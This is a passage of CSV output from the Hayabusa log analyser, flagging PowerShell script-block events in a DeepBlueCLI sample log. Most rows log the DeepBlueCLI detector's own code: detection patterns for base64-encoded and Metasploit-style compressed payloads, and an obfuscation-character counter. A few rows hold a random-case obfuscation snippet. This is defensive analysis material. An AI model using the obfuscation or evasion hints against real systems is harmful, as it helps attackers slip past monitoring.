# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.977 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.985 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it 
exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.987 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } 
else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.441 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? 
"","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.441 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.442 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.443 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:28.780 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:08.894 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:08.929 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:08.986 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.026 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.052 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = 
